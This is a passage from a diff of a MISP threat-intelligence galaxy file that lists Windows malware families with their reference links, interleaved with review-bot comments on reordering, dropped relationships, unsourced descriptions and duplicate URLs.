- "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://docplayer.net/162112338-Don-t-miss-the-forest-for-the-trees-gleaning-hunting-value-from-too-much-intrusion-data.html",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf",
- "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
"http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf",
- "https://github.com/TKCERT/winnti-detector",
- "https://www.fireeye.com/blog/threat-research/2021/01/emulation-of-kernel-mode-rootkits-with-speakeasy.html",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0921.pdf",
- "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/",
- "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
- "https://www.carbonblack.com/2020/02/20/threat-analysis-active-c2-discovery-using-protocol-emulation-part2-winnti-4-0/",
"http://2015.ruxcon.org.au/assets/2015/slides/Ruxcon%202015%20-%20McCormack.pdf",
- "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
- "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/",
- "https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/",
- "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf",
- "https://github.com/superkhung/winnti-sniff",
- "https://www.lastline.com/labsblog/helo-winnti-attack-scan/",
- "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques",
- "https://content.fireeye.com/api/pdfproxy?id=86840",
- "https://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf",
- "https://content.fireeye.com/apt-41/rpt-apt41/",
- "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/",
- "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://quointelligence.eu/2020/04/winnti-group-insights-from-the-past/",
- "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/",
- "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf",
- "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf",
- "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://github.com/TKCERT/winnti-nmap-script",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage",
- "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html",
- "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-winnti-malware-4-0/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://github.com/TKCERT/winnti-suricata-lua",
"https://attack.mitre.org/groups/G0096",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
+ "https://github.com/TKCERT/winnti-nmap-script",
+ "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf",
+ "https://quointelligence.eu/2020/04/winnti-group-insights-from-the-past/",
+ "https://securitynews.sonicwall.com/xmlpost/chinas-winnti-spyder-module/",
+ "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0921.pdf",
+ "https://docplayer.net/162112338-Don-t-miss-the-forest-for-the-trees-gleaning-hunting-value-from-too-much-intrusion-data.html",
+ "https://github.com/superkhung/winnti-sniff",
+ "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/slides/VB2022-Tracking-the-entire-iceberg.pdf",
+ "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/",
+ "https://content.fireeye.com/api/pdfproxy?id=86840",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf",
+ "https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/",
+ "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/",
+ "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf",
"https://www.cybereason.com/blog/operation-cuckoobees-a-winnti-malware-arsenal-deep-dive",
+ "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html",
+ "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-winnti-malware-4-0/",
+ "https://www.fireeye.com/blog/threat-research/2021/01/emulation-of-kernel-mode-rootkits-with-speakeasy.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
+ "https://www.lastline.com/labsblog/helo-winnti-attack-scan/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf",
+ "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html",
"https://www.tagesschau.de/investigativ/ndr/hackerangriff-chemieunternehmen-101.html",
+ "https://content.fireeye.com/apt-41/rpt-apt41/",
+ "https://github.com/br-data/2019-winnti-analyse/",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage",
+ "https://github.com/TKCERT/winnti-detector",
"https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/",
+ "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/",
"https://www.youtube.com/watch?v=_fstHQSK-kk",
- "https://blogs.vmware.com/security/2021/11/monitoring-winnti-4-0-c2-servers-for-two-years.html"
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf",
+ "https://www.carbonblack.com/2020/02/20/threat-analysis-active-c2-discovery-using-protocol-emulation-part2-winnti-4-0/",
+ "http://web.br.de/interaktiv/winnti/english/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
+ "https://securelist.com/games-are-over/70991/",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2022/winnti-apt-group-docks-in-sri-lanka-for-new-campaign-final.pdf",
+ "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Tracking-the-entire-iceberg-long-term-APT-malware-C2-protocol-emulation-and-scanning.pdf",
+ "https://github.com/TKCERT/winnti-suricata-lua",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://blogs.vmware.com/security/2021/11/monitoring-winnti-4-0-c2-servers-for-two-years.html",
+ "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/"
],
"synonyms": [
"BleDoor",
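Review bot: Most of this hunk is reordering rather than content: the VMware "monitoring-winnti-4-0-c2-servers" URL is removed and then re-added further down the same refs array, and the surrounding lines move around it, so the real additions (for example the Virus Bulletin VB2022 C2-emulation paper and the TKCERT winnti-suricata-lua repository) are hard to pick out of the noise. If the generator that builds this cluster emitted refs in a deterministic order (sorted, or in the order Malpedia returns them, but stable across runs), future diffs would show only genuine additions and removals and would be reviewable.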
@@ -48095,13 +50667,26 @@
"uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1",
"value": "Winnti (Windows)"
},
+ {
+ "description": "According to ESET Research, this is a payload downloaded by win.wslink. They attribute it with low confidence to Lazarus.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winordll64",
+ "https://www.welivesecurity.com/2023/02/23/winordll64-backdoor-vast-lazarus-arsenal/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "64f7f940-db4c-4569-869b-d282dadf55ac",
+ "value": "WinorDLL64"
+ },
{
"description": "WinPot is created to make ATMs by a popular ATM vendor to automatically dispense all cash from their most valuable cassettes.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.winpot",
- "https://securelist.com/atm-pos-malware-landscape-2017-2019/96750/",
"https://www.association-secure-transactions.eu/east-publishes-fraud-update-2-2018/",
+ "https://securelist.com/atm-pos-malware-landscape-2017-2019/96750/",
"https://securelist.com/atm-robber-winpot/89611/"
],
"synonyms": [
@@ -48143,11 +50728,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot",
- "https://docs.broadcom.com/doc/waterbug-attack-group",
"https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf",
"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf",
+ "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/",
"https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf",
- "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/"
+ "https://docs.broadcom.com/doc/waterbug-attack-group"
],
"synonyms": [
"Epic",
@@ -48155,15 +50740,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "36c0faf0-428e-4e7f-93c5-824bb0495ac9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "6b6cf608-cc2c-40d7-8500-afca3e35e7e4",
"value": "Wipbot"
},
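Review bot: This hunk silently drops the Wipbot entry's "related" block, i.e. the "similar" relationship to dest-uuid 36c0faf0-428e-4e7f-93c5-824bb0495ac9 with its estimative-language tag, and the same pattern repeats later in this patch for Yahoyah, Zebrocy, ZeroCleare and ZeroT. Those cross-galaxy links are what lets MISP correlate this cluster with the matching entry elsewhere, so losing them is a functional regression, not a cosmetic one. Either the commit message should state that the relationships are intentionally removed (and why), or the regeneration step that produces this file should carry the existing "related" arrays over when it rewrites an entry.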
@@ -48241,9 +50817,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.woolger",
- "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf",
+ "https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf",
"http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf",
- "https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf"
+ "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf"
],
"synonyms": [
"WoolenLogger"
@@ -48258,6 +50834,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.worldwind",
+ "https://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/",
"https://www.zscaler.com/blogs/security-research/no-honor-among-thieves-prynt-stealers-backdoor-exposed"
],
"synonyms": [],
@@ -48271,8 +50848,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.wormhole",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf",
- "https://content.fireeye.com/apt/rpt-apt38"
+ "https://content.fireeye.com/apt/rpt-apt38",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf"
],
"synonyms": [],
"type": []
@@ -48328,8 +50905,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.wslink",
"https://twitter.com/darienhuss/status/1453342652682981378",
- "https://www.welivesecurity.com/2021/10/27/wslink-unique-undocumented-malicious-loader-runs-server/",
- "https://www.welivesecurity.com/wp-content/uploads/2022/03/eset_wsliknkvm.pdf"
+ "https://www.welivesecurity.com/wp-content/uploads/2022/03/eset_wsliknkvm.pdf",
+ "https://www.welivesecurity.com/2021/10/27/wslink-unique-undocumented-malicious-loader-runs-server/"
],
"synonyms": [
"FinickyFrogfish"
@@ -48344,7 +50921,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.x4",
- "https://www.gradiant.org/noticia/analysis-malware-cve-2017/"
+ "https://www.gradiant.org/noticia/analysis-malware-cve-2017/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage"
],
"synonyms": [],
"type": []
@@ -48357,21 +50935,21 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent",
- "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/",
+ "https://www.thecssc.com/wp-content/uploads/2018/10/4OctoberIOC-APT28-malware-advisory.pdf",
"https://assets.documentcloud.org/documents/3461560/Google-Aquarium-Clean.pdf",
- "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf",
- "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
- "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf",
- "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf",
- "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government",
- "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
"https://securelist.com/apt-trends-report-q2-2020/97937/",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.secureworks.com/research/threat-profiles/iron-twilight",
- "https://www.thecssc.com/wp-content/uploads/2018/10/4OctoberIOC-APT28-malware-advisory.pdf",
+ "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
+ "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government",
+ "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf",
+ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
"https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
"https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/",
- "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf"
+ "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/",
+ "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf",
+ "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf",
+ "https://www.secureworks.com/research/threat-profiles/iron-twilight"
],
"synonyms": [
"chopstick",
@@ -48441,9 +51019,9 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.xdspy",
"https://www.welivesecurity.com/2020/10/02/xdspy-stealing-government-secrets-since-2011/",
- "https://github.com/eset/malware-ioc/tree/master/xdspy/",
"https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
- "https://vblocalhost.com/uploads/VB2020-Faou-Labelle.pdf"
+ "https://vblocalhost.com/uploads/VB2020-Faou-Labelle.pdf",
+ "https://github.com/eset/malware-ioc/tree/master/xdspy/"
],
"synonyms": [],
"type": []
@@ -48451,6 +51029,21 @@
"uuid": "2cf836f5-b88a-417d-b3c6-ab2580fea6ad",
"value": "XDSpy"
},
+ {
+ "description": "XenArmor is a suite of password recovery tools for various applications that have been observed to be abused in attacks alongside malware.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xenarmor",
+ "https://xenarmor.com/"
+ ],
+ "synonyms": [
+ "XenArmor Suite"
+ ],
+ "type": []
+ },
+ "uuid": "79fd77ba-4b40-4354-820a-16662edba41d",
+ "value": "XenArmor"
+ },
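Review bot: The new XenArmor entry's description says the suite "has been observed to be abused in attacks alongside malware", but the only refs are the Malpedia page and the vendor's own site (https://xenarmor.com/), neither of which documents that abuse. Add the reporting that observed it, or soften the description to what the listed refs support; as written, a reader cannot trace the claim.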
{
"description": "",
"meta": {
@@ -48469,6 +51062,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.xfilesstealer",
+ "https://cyberint.com/blog/research/xfiles-stealer-campaign-abusing-follina/",
"https://twitter.com/3xp0rtblog/status/1473323635469438978"
],
"synonyms": [],
@@ -48482,8 +51076,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.xfsadm",
- "https://twitter.com/VK_Intel/status/1149454961740255232",
- "https://twitter.com/r3c0nst/status/1149043362244308992"
+ "https://twitter.com/r3c0nst/status/1149043362244308992",
+ "https://twitter.com/VK_Intel/status/1149454961740255232"
],
"synonyms": [],
"type": []
@@ -48520,6 +51114,32 @@
"uuid": "e839ae61-616c-4234-8edb-36b48040e5af",
"value": "XiaoBa"
},
+ {
+ "description": "According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called \"bundling\".\r\n\r\nIn most cases, \"bundling\" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig",
+ "https://gridinsoft.com/xmrig"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "88efd461-03dd-42eb-976c-5e9fe403fce6",
+ "value": "xmrig"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xorist",
+ "https://www.fortinet.com/blog/threat-research/Ransomware-Roundup-New-Inlock-and-Xorist-Variants"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "029369aa-9e88-4e98-8fda-ca29a873acc5",
+ "value": "Xorist"
+ },
{
"description": "Ransomware.",
"meta": {
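Review bot: In the new xmrig entry the description opens with "According to PCrisk", yet the refs list only the Malpedia page and https://gridinsoft.com/xmrig, so the attributed source is not actually referenced; add the PCrisk page or attribute the text to the source that is listed. Two smaller style points in the same entry: the description embeds literal "\r\n\r\n" sequences, which no other description in this file uses, and the "value" is lowercase "xmrig" while the description itself writes "XMRIG"; check the casing against the Malpedia display name so the cluster value matches how the family is named elsewhere. The adjacent Xorist entry ships with an empty description even though its only non-Malpedia ref is an analysis write-up that could supply a one-line summary.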
@@ -48540,9 +51160,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.xpack",
- "https://thehackernews.com/2022/02/chinese-hackers-target-taiwanese.html",
"https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/china-apt-antlion-taiwan-financial-attacks"
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/china-apt-antlion-taiwan-financial-attacks",
+ "https://thehackernews.com/2022/02/chinese-hackers-target-taiwanese.html"
],
"synonyms": [
"NERAPACK"
@@ -48557,8 +51177,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.xpan",
- "https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/",
- "https://securelist.com/blog/research/78110/xpan-i-am-your-father/"
+ "https://securelist.com/blog/research/78110/xpan-i-am-your-father/",
+ "https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/"
],
"synonyms": [],
"type": []
@@ -48571,9 +51191,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.xpctra",
+ "https://www.buguroo.com/en/blog/bank-malware-in-brazil-xpctra-rat-analysis",
"https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html",
- "https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/",
- "https://www.buguroo.com/en/blog/bank-malware-in-brazil-xpctra-rat-analysis"
+ "https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/"
],
"synonyms": [
"Expectra"
@@ -48588,8 +51208,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.xpertrat",
- "https://www.veronicavaleros.com/blog/2018/3/12/a-study-of-rats-third-timeline-iteration",
"https://labs.k7computing.com/?p=15672",
+ "https://www.veronicavaleros.com/blog/2018/3/12/a-study-of-rats-third-timeline-iteration",
"https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html"
],
"synonyms": [],
@@ -48632,9 +51252,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus",
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf",
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
- "https://securelist.com/analysis/publications/69953/the-naikon-apt/",
- "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf"
+ "https://securelist.com/analysis/publications/69953/the-naikon-apt/"
],
"synonyms": [
"nokian"
@@ -48649,18 +51269,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel",
- "https://securelist.com/big-threats-using-code-similarity-part-1/97239/",
- "https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf",
- "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government",
- "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
- "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government",
- "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/",
"http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf",
+ "https://securelist.com/big-threats-using-code-similarity-part-1/97239/",
+ "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/",
"https://securelist.com/apt-trends-report-q2-2020/97937/",
- "https://www.secureworks.com/research/threat-profiles/iron-twilight",
"https://www.root9b.com/sites/default/files/whitepapers/R9b_FSOFACY_0.pdf",
+ "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government",
+ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
"https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
- "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf"
+ "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government",
+ "https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf",
+ "https://www.secureworks.com/research/threat-profiles/iron-twilight"
],
"synonyms": [
"Shunnael",
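Review bot: After this reorder the XTunnel refs still contain the same Symantec article twice, once as https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government and once as https://www.symantec.com/blogs/election-security/apt28-espionage-military-government. The XAgent hunk above keeps only the broadcom.com form, so that is presumably the canonical one; drop the symantec.com duplicate here, and consider adding a hostname-normalising dedup step to the generator so this class of duplicate does not recur.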
@@ -48698,18 +51318,33 @@
"uuid": "8a57cd75-4572-47c2-b5ef-55df978258de",
"value": "Xwo"
},
+ {
+ "description": "Malware with wide range of capabilities ranging from RAT to ransomware.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm",
+ "https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/",
+ "https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla",
+ "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a5a05a52-5267-4baf-b4a3-366409b46721",
+ "value": "XWorm"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/",
- "https://jsac.jpcert.or.jp/archive/2019/pdf/JSAC2019_8_nakatsuru_en.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-butler",
- "https://www.macnica.net/mpressioncss/feature_05.html/",
"https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
+ "https://jsac.jpcert.or.jp/archive/2019/pdf/JSAC2019_8_nakatsuru_en.pdf",
+ "https://www.macnica.net/mpressioncss/feature_05.html/",
+ "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
+ "https://www.secureworks.com/research/threat-profiles/bronze-butler",
"https://www.cybereason.com/blog/labs-shadowwali-new-variant-of-the-xxmm-family-of-backdoors",
- "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/"
],
"synonyms": [
"ShadowWalker"
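Review bot: The new XWorm entry's description reads "Malware with wide range of capabilities ranging from RAT to ransomware." and is missing an article; "Malware with a wide range of capabilities, from RAT to ransomware." reads cleanly and avoids the "range ... ranging" repetition. The refs themselves (Cyble, Elastic Security Labs, Loginsoft) look appropriate for the claim.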
@@ -48731,15 +51366,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "2a16a1d4-a098-4f17-80f3-3cfc6c60b539",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a673b4fb-a864-4a5b-94ab-3fc4f5606cc8",
"value": "Yahoyah"
},
@@ -48763,6 +51389,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.yamabot",
+ "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
"https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html?m=1",
"https://blogs.jpcert.or.jp/en/2022/07/yamabot.html"
],
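Review bot: The line added to Yamabot, https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html, is the same post as the existing https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html?m=1 entry, which is merely the mobile-rendering variant of that URL. Keep the canonical URL that this hunk adds and remove the "?m=1" one rather than carrying both; stripping such tracking or rendering query parameters before dedup in the generator would prevent this.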
@@ -48779,14 +51406,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.yanluowang",
- "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html",
- "https://github.com/albertzsigovits/malware-notes/tree/master/Ransomware-Windows-Yanluowang",
- "https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-yanluowang-ransomware-victims/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-targeted-ransomware",
"https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
"https://securelist.com/how-to-recover-files-encrypted-by-yanlouwang/106332/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-targeted-ransomware"
+ "https://github.com/albertzsigovits/malware-notes/tree/master/Ransomware-Windows-Yanluowang",
+ "https://de.darktrace.com/blog/inside-the-yanluowang-leak-organization-members-and-tactics",
+ "https://therecord.media/the-yanluowang-ransomware-group-in-their-own-words/",
+ "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html",
+ "https://twitter.com/CryptoInsane/status/1586967110504398853",
